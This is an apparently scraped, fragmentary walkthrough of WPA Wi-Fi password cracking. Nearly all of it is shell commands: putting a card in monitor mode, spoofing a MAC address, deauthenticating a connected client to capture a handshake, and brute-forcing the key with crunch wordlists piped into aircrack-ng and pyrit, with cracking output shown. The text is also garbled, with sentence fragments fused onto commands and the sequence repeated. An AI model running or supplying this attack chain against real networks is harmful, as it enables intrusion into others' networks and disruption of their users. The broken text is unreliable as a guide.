airmon-ng
Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
airodump-ng mon0
Ctrl+c
" to break the program.airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -
8 16
is the length of the password, i.e. from 8 characters to 16 characters.airmon-ng
Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
airodump-ng mon0
Ctrl+c
" to break the program.airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
crunch 3.0
(the current version at the time of this writing).http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
http://code.google.com/p/pyrit/downloads/list
pyrit
and cpyrit-cuda
(the current version is 0.4.0 at the time of this writing).tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install
tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
8 16
is the length of the password, i.e. from 8 characters to 16 characters.wpacrack-01.cap
, you should do the following step.pyrit -r wpacrack-01.cap -o new.cap stripLive
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
8 16
is the length of the password, i.e. from 8 characters to 16 characters.Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)
Tried 17960898 PMKs so far; 17504 PMKs per second.
airodump-ng mon0
aireplay-ng -9 mon0
pyrit list_cores